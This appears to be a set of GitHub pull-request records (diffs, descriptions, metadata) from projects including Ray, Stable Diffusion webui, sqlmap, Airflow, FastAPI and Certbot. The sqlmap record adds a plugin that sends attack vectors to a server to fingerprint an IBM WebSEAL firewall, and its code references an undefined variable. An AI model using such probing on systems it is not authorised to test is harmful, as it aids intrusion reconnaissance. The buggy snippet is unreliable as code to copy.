+ /// Destruct this gRPC service.
+ ~GrpcService() {}
+
+ protected:
+ /// Return the underlying grpc::Service object for this class.
+ /// This is passed to `GrpcServer` to be registered to grpc `ServerBuilder`.
+ virtual grpc::Service &GetGrpcService() = 0;
+
+ /// Subclasses should implement this method to initialize the `ServerCallFactory`
+ /// instances, as well as specify maximum number of concurrent requests that gRPC
+ /// server can "accept" (not "handle"). Each factory will be used to create
+ /// `accept_concurrency` `ServerCall` objects, each of which will be used to accept and
+ /// handle an incoming request.
+ ///
+ /// \param[in] cq The grpc completion queue.
+ /// \param[out] server_call_factories_and_concurrencies The `ServerCallFactory` objects,
+ /// and the maximum number of concurrent requests that gRPC server can accept.
+ virtual void InitServerCallFactories(
+ const std::unique_ptr<grpc::ServerCompletionQueue> &cq,
+ std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
+ *server_call_factories_and_concurrencies) = 0;
+
+ /// The main event loop, to which the service handler functions will be posted.
+ boost::asio::io_service &main_service_;
+
+ friend class GrpcServer;
+};
+
} // namespace rpc
} // namespace ray
diff --git a/src/ray/rpc/node_manager_server.h b/src/ray/rpc/node_manager_server.h
index afaea299ea891..d05f268c65b24 100644
--- a/src/ray/rpc/node_manager_server.h
+++ b/src/ray/rpc/node_manager_server.h
@@ -25,25 +25,22 @@ class NodeManagerServiceHandler {
RequestDoneCallback done_callback) = 0;
};
-/// The `GrpcServer` for `NodeManagerService`.
-class NodeManagerServer : public GrpcServer {
+/// The `GrpcService` for `NodeManagerService`.
+class NodeManagerGrpcService : public GrpcService {
public:
/// Constructor.
///
- /// \param[in] port See super class.
- /// \param[in] main_service See super class.
+ /// \param[in] io_service See super class.
/// \param[in] handler The service handler that actually handle the requests.
- NodeManagerServer(const uint32_t port, boost::asio::io_service &main_service,
- NodeManagerServiceHandler &service_handler)
- : GrpcServer("NodeManager", port, main_service),
- service_handler_(service_handler){};
+ NodeManagerGrpcService(boost::asio::io_service &io_service,
+ NodeManagerServiceHandler &service_handler)
+ : GrpcService(io_service), service_handler_(service_handler){};
- void RegisterServices(grpc::ServerBuilder &builder) override {
- /// Register `NodeManagerService`.
- builder.RegisterService(&service_);
- }
+ protected:
+ grpc::Service &GetGrpcService() override { return service_; }
void InitServerCallFactories(
+ const std::unique_ptr<grpc::ServerCompletionQueue> &cq,
std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
*server_call_factories_and_concurrencies) override {
// Initialize the factory for `ForwardTask` requests.
@@ -51,7 +48,8 @@ class NodeManagerServer : public GrpcServer {
new ServerCallFactoryImpl<NodeManagerService, NodeManagerServiceHandler,
ForwardTaskRequest, ForwardTaskReply>(
service_, &NodeManagerService::AsyncService::RequestForwardTask,
- service_handler_, &NodeManagerServiceHandler::HandleForwardTask, cq_));
+ service_handler_, &NodeManagerServiceHandler::HandleForwardTask, cq,
+ main_service_));
// Set `ForwardTask`'s accept concurrency to 100.
server_call_factories_and_concurrencies->emplace_back(
@@ -61,6 +59,7 @@ class NodeManagerServer : public GrpcServer {
private:
/// The grpc async service object.
NodeManagerService::AsyncService service_;
+
/// The service handler that actually handle the requests.
NodeManagerServiceHandler &service_handler_;
};
diff --git a/src/ray/rpc/server_call.h b/src/ray/rpc/server_call.h
index e06278260ab67..08ca128323ee3 100644
--- a/src/ray/rpc/server_call.h
+++ b/src/ray/rpc/server_call.h
@@ -94,20 +94,27 @@ class ServerCallImpl : public ServerCall {
/// \param[in] factory The factory which created this call.
/// \param[in] service_handler The service handler that handles the request.
/// \param[in] handle_request_function Pointer to the service handler function.
+ /// \param[in] io_service The event loop.
ServerCallImpl(
const ServerCallFactory &factory, ServiceHandler &service_handler,
- HandleRequestFunction<ServiceHandler, Request, Reply> handle_request_function)
+ HandleRequestFunction<ServiceHandler, Request, Reply> handle_request_function,
+ boost::asio::io_service &io_service)
: state_(ServerCallState::PENDING),
factory_(factory),
service_handler_(service_handler),
handle_request_function_(handle_request_function),
- response_writer_(&context_) {}
+ response_writer_(&context_),
+ io_service_(io_service) {}
ServerCallState GetState() const override { return state_; }
void SetState(const ServerCallState &new_state) override { state_ = new_state; }
void HandleRequest() override {
+ io_service_.post([this] { HandleRequestImpl(); });
+ }
+
+ void HandleRequestImpl() {
state_ = ServerCallState::PROCESSING;
(service_handler_.*handle_request_function_)(request_, &reply_,
[this](Status status) {
@@ -146,6 +153,9 @@ class ServerCallImpl : public ServerCall {
/// The reponse writer.
grpc::ServerAsyncResponseWriter<Reply> response_writer_;
+ /// The event loop.
+ boost::asio::io_service &io_service_;
+
/// The request message.
Request request_;
@@ -185,23 +195,26 @@ class ServerCallFactoryImpl : public ServerCallFactory {
/// \param[in] service_handler The service handler that handles the request.
/// \param[in] handle_request_function Pointer to the service handler function.
/// \param[in] cq The `CompletionQueue`.
+ /// \param[in] io_service The event loop.
ServerCallFactoryImpl(
AsyncService &service,
RequestCallFunction<GrpcService, Request, Reply> request_call_function,
ServiceHandler &service_handler,
HandleRequestFunction<ServiceHandler, Request, Reply> handle_request_function,
- const std::unique_ptr<grpc::ServerCompletionQueue> &cq)
+ const std::unique_ptr<grpc::ServerCompletionQueue> &cq,
+ boost::asio::io_service &io_service)
: service_(service),
request_call_function_(request_call_function),
service_handler_(service_handler),
handle_request_function_(handle_request_function),
- cq_(cq) {}
+ cq_(cq),
+ io_service_(io_service) {}
ServerCall *CreateCall() const override {
// Create a new `ServerCall`. This object will eventually be deleted by
// `GrpcServer::PollEventsFromCompletionQueue`.
auto call = new ServerCallImpl<ServiceHandler, Request, Reply>(
- *this, service_handler_, handle_request_function_);
+ *this, service_handler_, handle_request_function_, io_service_);
/// Request gRPC runtime to starting accepting this kind of request, using the call as
/// the tag.
(service_.*request_call_function_)(&call->context_, &call->request_,
@@ -225,6 +238,9 @@ class ServerCallFactoryImpl : public ServerCallFactory {
/// The `CompletionQueue`.
const std::unique_ptr<grpc::ServerCompletionQueue> &cq_;
+
+ /// The event loop.
+ boost::asio::io_service &io_service_;
};
} // namespace rpc
|
## What do these changes do?
Support multiple services for a single gRPC server:
- add a `GrpcService` abstraction in addition to `GrpcServer`
- allow different RPC services to be registered on a single RPC server; they can use different `IO services` while sharing a single port, which is needed to support direct actor calls.
## Related issue number
#5029
## Linter
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
|
https://api.github.com/repos/ray-project/ray/pulls/5023
|
2019-06-24T08:10:38Z
|
2019-06-26T02:08:10Z
|
2019-06-26T02:08:10Z
|
2019-06-26T04:19:33Z
| 3,913
|
ray-project/ray
| 19,704
|
Change denoising_strength default to None.
|
diff --git a/modules/processing.py b/modules/processing.py
index e124e7f0dd2..061d9955a24 100644
--- a/modules/processing.py
+++ b/modules/processing.py
@@ -142,7 +142,7 @@ class StableDiffusionProcessing:
overlay_images: list = None
eta: float = None
do_not_reload_embeddings: bool = False
- denoising_strength: float = 0
+ denoising_strength: float = None
ddim_discretize: str = None
s_min_uncond: float = None
s_churn: float = None
|
Fixes a bug where `Denoising strength: 0` is added to the metadata of API images unless the value is explicitly set to `None` in the API payload. This caused hires fix to always be enabled when reading the metadata from such an image, even if the image didn't use hires fix to begin with.
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/13466
|
2023-10-02T04:48:53Z
|
2023-10-02T10:05:27Z
|
2023-10-02T10:05:27Z
|
2023-10-02T10:05:30Z
| 143
|
AUTOMATIC1111/stable-diffusion-webui
| 39,676
|
IBM Webseal
|
diff --git a/waf/ibm_webseal.py b/waf/ibm_webseal.py
new file mode 100644
index 00000000000..220c13c3976
--- /dev/null
+++ b/waf/ibm_webseal.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "IBM Security Access Manager for Web WebSEAL."
+
+def detect(get_page):
+ retval = False
+
+ for vector in WAF_ATTACK_VECTORS:
+ _, headers, _ = get_page(get=vector)
+ retval = re.search(r"WebSEAL/9.0.5.0", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+ retval |= "The Access Manager WebSEAL server received an invalid HTTP request." in (page or "") is not None
+ if retval:
+ break
+
+ return retval
|
**HTTP Request**
```
GET /?search=queryhere HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```
**HTTP Response**
```
HTTP/1.1 400 Bad Request
content-length: 1382
content-type: text/html
date: Sat, 09 Feb 2019 11:17:46 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/9.0.5.0
cache-control: no-store
strict-transport-security:
pragma: no-cache
```

|
https://api.github.com/repos/sqlmapproject/sqlmap/pulls/3479
|
2019-02-09T11:27:19Z
|
2019-02-09T13:44:05Z
|
2019-02-09T13:44:05Z
|
2019-02-09T14:03:49Z
| 276
|
sqlmapproject/sqlmap
| 15,074
|
Remove message.content from openai streaming API
|
diff --git a/extensions/openai/completions.py b/extensions/openai/completions.py
index c6deefb3d2..897d542ce5 100644
--- a/extensions/openai/completions.py
+++ b/extensions/openai/completions.py
@@ -297,8 +297,6 @@ def chat_streaming_chunk(content):
resp_list: [{
"index": 0,
"finish_reason": None,
- # So yeah... do both methods? delta and messages.
- "message": {'role': 'assistant', 'content': content},
"delta": {'role': 'assistant', 'content': content},
}],
}
|
The [OpenAI spec](https://platform.openai.com/docs/api-reference/streaming) does not expect a `message` object when streaming is enabled. Returning both sometimes [causes issues in downstream consumers](https://github.com/danny-avila/LibreChat/discussions/1795).
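For illustration only (not part of the original PR), a sketch of what a single spec-compliant streaming chunk might look like after this change; the `choices` fields mirror the diff, while the envelope fields (`id`, `object`, `created`, `model`) are placeholders rather than values taken from the extension:
```python
# Hypothetical example of a single streaming chunk after this change: the
# incremental text lives only in "delta"; no "message" key is emitted.
chunk = {
    "id": "chatcmpl-123",                  # placeholder id
    "object": "chat.completion.chunk",
    "created": 1700000000,                 # placeholder timestamp
    "model": "local-model",                # placeholder model name
    "choices": [
        {
            "index": 0,
            "finish_reason": None,
            "delta": {"role": "assistant", "content": "Hello"},
        }
    ],
}
```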
## Checklist:
- [x] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines).
|
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5503
|
2024-02-14T14:54:39Z
|
2024-02-19T21:50:28Z
|
2024-02-19T21:50:28Z
|
2024-02-19T21:50:28Z
| 145
|
oobabooga/text-generation-webui
| 26,431
|
added link re: raidforums
|
diff --git a/removed_sites.md b/removed_sites.md
index 4a8cb12d8..01accb108 100644
--- a/removed_sites.md
+++ b/removed_sites.md
@@ -1390,7 +1390,7 @@ As og 2022-05-01, Steam returns false positives
## Raidforums
-Raidforums is now run by the FBI
+Raidforums is [now run by the FBI](https://twitter.com/janomine/status/1499453777648234501?s=21)
```json
"Raidforums": {
"errorType": "status_code",
@@ -1580,4 +1580,4 @@ As of 09.10.2022, Google Developer returns false positives. The site is dynamic
"username_claimed": "blue",
"username_unclaimed": "noonewouldeverusethis7"
},
-```
\ No newline at end of file
+```
|
added link re: raidforums
|
https://api.github.com/repos/sherlock-project/sherlock/pulls/1548
|
2022-10-13T05:00:08Z
|
2022-10-13T20:02:09Z
|
2022-10-13T20:02:09Z
|
2022-10-13T20:02:19Z
| 215
|
sherlock-project/sherlock
| 36,508
|
[AIRFLOW-3977] Fix/Add examples of how trigger rules interacted with skipped tasks
|
diff --git a/docs/concepts.rst b/docs/concepts.rst
index 9ca1978217739..de2ce228d002b 100644
--- a/docs/concepts.rst
+++ b/docs/concepts.rst
@@ -752,6 +752,67 @@ Note that these can be used in conjunction with ``depends_on_past`` (boolean)
that, when set to ``True``, keeps a task from getting triggered if the
previous schedule for the task hasn't succeeded.
+One must be aware of the interaction between trigger rules and skipped tasks
+in schedule level. Skipped tasks will cascade through trigger rules
+``all_success`` and ``all_failed`` but not ``all_done``, ``one_failed``, ``one_success``,
+``none_failed`` and ``dummy``.
+
+For example, consider the following DAG:
+
+.. code:: python
+
+ #dags/branch_without_trigger.py
+ import datetime as dt
+
+ from airflow.models import DAG
+ from airflow.operators.dummy_operator import DummyOperator
+ from airflow.operators.python_operator import BranchPythonOperator
+
+ dag = DAG(
+ dag_id='branch_without_trigger',
+ schedule_interval='@once',
+ start_date=dt.datetime(2019, 2, 28)
+ )
+
+ run_this_first = DummyOperator(task_id='run_this_first', dag=dag)
+ branching = BranchPythonOperator(
+ task_id='branching', dag=dag,
+ python_callable=lambda: 'branch_a'
+ )
+
+ branch_a = DummyOperator(task_id='branch_a', dag=dag)
+ follow_branch_a = DummyOperator(task_id='follow_branch_a', dag=dag)
+
+ branch_false = DummyOperator(task_id='branch_false', dag=dag)
+
+ join = DummyOperator(task_id='join', dag=dag)
+
+ run_this_first >> branching
+ branching >> branch_a >> follow_branch_a >> join
+ branching >> branch_false >> join
+
+In the case of this DAG, ``join`` is downstream of ``follow_branch_a``
+and ``branch_false``. The ``join`` task will show up as skipped
+because its ``trigger_rule`` is set to ``all_success`` by default and
+skipped tasks will cascade through ``all_success``.
+
+.. image:: img/branch_without_trigger.png
+
+By setting ``trigger_rule`` to ``none_failed`` in ``join`` task,
+
+.. code:: python
+
+ #dags/branch_with_trigger.py
+ ...
+ join = DummyOperator(task_id='join', dag=dag, trigger_rule='none_failed')
+ ...
+
+The ``join`` task will be triggered as soon as
+``branch_false`` has been skipped (a valid completion state) and
+``follow_branch_a`` has succeeded. Because skipped tasks **will not**
+cascade through ``none_failed``.
+
+.. image:: img/branch_with_trigger.png
Latest Run Only
===============
@@ -764,21 +825,9 @@ a pause just wastes CPU cycles.
For situations like this, you can use the ``LatestOnlyOperator`` to skip
tasks that are not being run during the most recent scheduled run for a
-DAG. The ``LatestOnlyOperator`` skips all immediate downstream tasks, and
-itself, if the time right now is not between its ``execution_time`` and the
-next scheduled ``execution_time``.
-
-One must be aware of the interaction between skipped tasks and trigger
-rules. Skipped tasks will cascade through trigger rules ``all_success``
-and ``all_failed`` but not ``all_done``, ``one_failed``, ``one_success``,
-and ``dummy``. If you would like to use the ``LatestOnlyOperator`` with
-trigger rules that do not cascade skips, you will need to ensure that the
-``LatestOnlyOperator`` is **directly** upstream of the task you would like
-to skip.
-
-It is possible, through use of trigger rules to mix tasks that should run
-in the typical date/time dependent mode and those using the
-``LatestOnlyOperator``.
+DAG. The ``LatestOnlyOperator`` skips all downstream tasks, if the time
+right now is not between its ``execution_time`` and the next scheduled
+``execution_time``.
For example, consider the following DAG:
@@ -795,8 +844,8 @@ For example, consider the following DAG:
dag = DAG(
dag_id='latest_only_with_trigger',
- schedule_interval=dt.timedelta(hours=4),
- start_date=dt.datetime(2016, 9, 20),
+ schedule_interval=dt.timedelta(hours=1),
+ start_date=dt.datetime(2019, 2, 28),
)
latest_only = LatestOnlyOperator(task_id='latest_only', dag=dag)
@@ -820,9 +869,8 @@ for all runs except the latest run. ``task1`` is directly downstream of
scheduled periods. ``task3`` is downstream of ``task1`` and ``task2`` and
because of the default ``trigger_rule`` being ``all_success`` will receive
a cascaded skip from ``task1``. ``task4`` is downstream of ``task1`` and
-``task2`` but since its ``trigger_rule`` is set to ``all_done`` it will
-trigger as soon as ``task1`` has been skipped (a valid completion state)
-and ``task2`` has succeeded.
+``task2``. It will be first skipped directly by ``LatestOnlyOperator``,
+even its ``trigger_rule`` is set to ``all_done``.
.. image:: img/latest_only_with_trigger.png
diff --git a/docs/img/branch_with_trigger.png b/docs/img/branch_with_trigger.png
new file mode 100644
index 0000000000000..0aab8a1b3a5c8
Binary files /dev/null and b/docs/img/branch_with_trigger.png differ
diff --git a/docs/img/branch_without_trigger.png b/docs/img/branch_without_trigger.png
new file mode 100644
index 0000000000000..748c796a4981f
Binary files /dev/null and b/docs/img/branch_without_trigger.png differ
diff --git a/docs/img/latest_only_with_trigger.png b/docs/img/latest_only_with_trigger.png
index 629adfa907964..623f8ee177ff0 100644
Binary files a/docs/img/latest_only_with_trigger.png and b/docs/img/latest_only_with_trigger.png differ
|
### Jira
- [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title.
- https://issues.apache.org/jira/browse/AIRFLOW-3977
- https://issues.apache.org/jira/browse/AIRFLOW-1784
### Description
- [x] Here are some details about my PR, including screenshots of any UI changes:
The current LatestOnlyOperator skips all downstream tasks blindly. However, the doc claims it respects trigger rules, which is incorrect.
The doc also shows an incorrect example of how skipped tasks interact with trigger rules at the schedule level. I replace it with other examples using BranchPythonOperator (a condensed sketch of the key change follows below).
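For illustration only (not part of the original PR description; condensed from the example added to the docs in the diff above), the gist of the branching example is that the join task needs a `none_failed` trigger rule so the skip from the unfollowed branch does not cascade into it:
```python
import datetime as dt

from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import BranchPythonOperator

dag = DAG(
    dag_id='branch_with_trigger_sketch',
    schedule_interval='@once',
    start_date=dt.datetime(2019, 2, 28),
)

branching = BranchPythonOperator(
    task_id='branching', dag=dag, python_callable=lambda: 'branch_a'
)
branch_a = DummyOperator(task_id='branch_a', dag=dag)
branch_false = DummyOperator(task_id='branch_false', dag=dag)

# With the default trigger_rule ('all_success') the skip from 'branch_false'
# would cascade into 'join'; 'none_failed' lets 'join' run once 'branch_a'
# succeeds and 'branch_false' is skipped.
join = DummyOperator(task_id='join', dag=dag, trigger_rule='none_failed')

branching >> branch_a >> join
branching >> branch_false >> join
```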
### Tests
- [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
No tests needed because the changes are documentation-only.
### Commits
- [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [x] In case of new functionality, my PR adds documentation that describes how to use it.
- When adding new operators/hooks/sensors, the autoclass documentation generation needs to be added.
- All the public functions and the classes in the PR contain docstrings that explain what it does
### Code Quality
- [x] Passes `flake8`
|
https://api.github.com/repos/apache/airflow/pulls/4805
|
2019-03-01T03:15:32Z
|
2019-03-02T07:13:58Z
|
2019-03-02T07:13:58Z
|
2019-04-16T06:42:47Z
| 1,435
|
apache/airflow
| 14,404
|
📝 Add articles to External Links
|
diff --git a/docs/en/data/external_links.yml b/docs/en/data/external_links.yml
index 00e92801fe5d0..15a513a4da1b9 100644
--- a/docs/en/data/external_links.yml
+++ b/docs/en/data/external_links.yml
@@ -136,6 +136,14 @@ articles:
title: Build And Host Fast Data Science Applications Using FastAPI
author_link: https://medium.com/@farhadmalik
author: Farhad Malik
+ - link: https://medium.com/@gabbyprecious2000/creating-a-crud-app-with-fastapi-part-one-7c049292ad37
+ title: Creating a CRUD App with FastAPI (Part one)
+ author_link: https://medium.com/@gabbyprecious2000
+ author: Precious Ndubueze
+ - link: https://julienharbulot.com/notification-server.html
+ title: HTTP server to display desktop notifications
+ author_link: https://julienharbulot.com/
+ author: Julien Harbulot
japanese:
- link: https://qiita.com/mtitg/items/47770e9a562dd150631d
title: FastAPI|DB接続してCRUDするPython製APIサーバーを構築
|
📝 Add a couple of articles to External Links
|
https://api.github.com/repos/tiangolo/fastapi/pulls/2247
|
2020-10-25T18:19:24Z
|
2020-10-25T18:25:32Z
|
2020-10-25T18:25:32Z
|
2020-10-25T18:25:35Z
| 297
|
tiangolo/fastapi
| 23,560
|
The course 'Neural Networks for Machine Learning is no longer availab…
|
diff --git a/courses.md b/courses.md
index 57a92f6f..cd1725ba 100644
--- a/courses.md
+++ b/courses.md
@@ -5,7 +5,7 @@ The following is a list of free or paid online courses on machine learning, stat
* [Artificial Intelligence (Columbia University)](https://www.edx.org/course/artificial-intelligence-ai-columbiax-csmm-101x-0) - free
* [Machine Learning (Columbia University)](https://www.edx.org/course/machine-learning-columbiax-csmm-102x-0) - free
* [Machine Learning (Stanford University)](https://www.coursera.org/learn/machine-learning) - free
-* [Neural Networks for Machine Learning (University of Toronto)](https://www.coursera.org/learn/neural-networks) - free. Also [available on YouTube](https://www.youtube.com/watch?v=cbeTc-Urqak&list=PLYvFQm7QY5Fy28dST8-qqzJjXr83NKWAr) as a playlist.
+* [Neural Networks for Machine Learning (University of Toronto)](https://www.coursera.org/learn/neural-networks) - free. Also [available on YouTube](https://www.youtube.com/watch?v=cbeTc-Urqak&list=PLYvFQm7QY5Fy28dST8-qqzJjXr83NKWAr) as a playlist. #This course is no longer available on Coursera.
* [Deep Learning Specialization (by Andrew Ng, deeplearning.ai)](https://www.coursera.org/specializations/deep-learning) - Courses: I Neural Networks and Deep Learning; II Improving Deep Neural Networks: Hyperparameter tuning, Regularization and Optimization; III Structuring Machine Learning Projects; IV Convolutional Neural Networks; V Sequence Models; Paid for grading/certification, financial aid available, free to audit
* [Deep Learning Nano Degree on Udacity](https://www.udacity.com/course/deep-learning-nanodegree--nd101) - $
* [Intro to Deep Learning (MIT)](http://introtodeeplearning.com/)
|
The course 'Neural Networks for Machine Learning' is no longer available on Coursera.
|
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/634
|
2019-10-02T16:04:03Z
|
2019-10-07T22:42:53Z
|
2019-10-07T22:42:52Z
|
2019-10-07T22:42:53Z
| 496
|
josephmisiti/awesome-machine-learning
| 51,908
|
Do not document private members
|
diff --git a/acme/docs/conf.py b/acme/docs/conf.py
index 01029a81f7e..8c1689128c8 100644
--- a/acme/docs/conf.py
+++ b/acme/docs/conf.py
@@ -41,7 +41,7 @@
]
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-cloudflare/docs/conf.py b/certbot-dns-cloudflare/docs/conf.py
index 488268577da..97e54421ea5 100644
--- a/certbot-dns-cloudflare/docs/conf.py
+++ b/certbot-dns-cloudflare/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-cloudxns/docs/conf.py b/certbot-dns-cloudxns/docs/conf.py
index 16ccd1d62d9..1fc05c94cc5 100644
--- a/certbot-dns-cloudxns/docs/conf.py
+++ b/certbot-dns-cloudxns/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-digitalocean/docs/conf.py b/certbot-dns-digitalocean/docs/conf.py
index 9c493a22011..0741e4cea3a 100644
--- a/certbot-dns-digitalocean/docs/conf.py
+++ b/certbot-dns-digitalocean/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-dnsimple/docs/conf.py b/certbot-dns-dnsimple/docs/conf.py
index b5cb24e2fab..99cc931356e 100644
--- a/certbot-dns-dnsimple/docs/conf.py
+++ b/certbot-dns-dnsimple/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-dnsmadeeasy/docs/conf.py b/certbot-dns-dnsmadeeasy/docs/conf.py
index 60e0163bd50..1f0c57812ea 100644
--- a/certbot-dns-dnsmadeeasy/docs/conf.py
+++ b/certbot-dns-dnsmadeeasy/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-gehirn/docs/conf.py b/certbot-dns-gehirn/docs/conf.py
index 67aafa3b404..527bc3d55be 100644
--- a/certbot-dns-gehirn/docs/conf.py
+++ b/certbot-dns-gehirn/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-google/docs/conf.py b/certbot-dns-google/docs/conf.py
index 8f045cf3f1f..b2ddcfb3473 100644
--- a/certbot-dns-google/docs/conf.py
+++ b/certbot-dns-google/docs/conf.py
@@ -39,7 +39,7 @@
'jsonlexer']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-linode/docs/conf.py b/certbot-dns-linode/docs/conf.py
index f23d6502381..c6d564b7a34 100644
--- a/certbot-dns-linode/docs/conf.py
+++ b/certbot-dns-linode/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-luadns/docs/conf.py b/certbot-dns-luadns/docs/conf.py
index 899480f66e9..8e9d499887d 100644
--- a/certbot-dns-luadns/docs/conf.py
+++ b/certbot-dns-luadns/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-nsone/docs/conf.py b/certbot-dns-nsone/docs/conf.py
index aec0771a206..5531959eddf 100644
--- a/certbot-dns-nsone/docs/conf.py
+++ b/certbot-dns-nsone/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-ovh/docs/conf.py b/certbot-dns-ovh/docs/conf.py
index a4985edee8d..56e24a92006 100644
--- a/certbot-dns-ovh/docs/conf.py
+++ b/certbot-dns-ovh/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-rfc2136/docs/conf.py b/certbot-dns-rfc2136/docs/conf.py
index e4df8459440..c0d55078e78 100644
--- a/certbot-dns-rfc2136/docs/conf.py
+++ b/certbot-dns-rfc2136/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-route53/docs/conf.py b/certbot-dns-route53/docs/conf.py
index cb8aae0b6c8..c2eb880ac59 100644
--- a/certbot-dns-route53/docs/conf.py
+++ b/certbot-dns-route53/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-sakuracloud/docs/conf.py b/certbot-dns-sakuracloud/docs/conf.py
index f973779ab83..70a4d74347f 100644
--- a/certbot-dns-sakuracloud/docs/conf.py
+++ b/certbot-dns-sakuracloud/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot/docs/conf.py b/certbot/docs/conf.py
index 6b7c1c2c061..1e57bc2247c 100644
--- a/certbot/docs/conf.py
+++ b/certbot/docs/conf.py
@@ -52,7 +52,7 @@
extensions.append('sphinx.ext.imgconverter')
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
